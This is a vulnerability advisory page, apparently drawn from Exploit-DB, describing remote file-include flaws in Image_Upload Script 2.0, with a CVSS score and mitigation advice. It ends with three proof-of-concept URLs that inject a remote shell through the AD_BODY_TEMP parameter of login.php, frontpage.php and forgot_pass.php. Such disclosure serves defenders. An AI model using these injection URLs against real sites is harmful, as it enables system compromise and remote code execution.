header-logo
Suggest Exploit
vendor:
Image_Upload Script
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Image_Upload Script
Affected Version From: Version 2.0
Affected Version To: Version 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Image_Upload Script Remote File Include Vulnerability

The Image_Upload Script is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Sanitize user-supplied data to prevent remote file inclusion vulnerabilities. Apply necessary input validation and filtering to ensure that user inputs are properly sanitized and do not contain malicious code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23132/info

Image_Upload Script is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Version 2.0 is vulnerable to these issues. 

http://www.example.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?
http://www.example.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?
http://www.example.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell?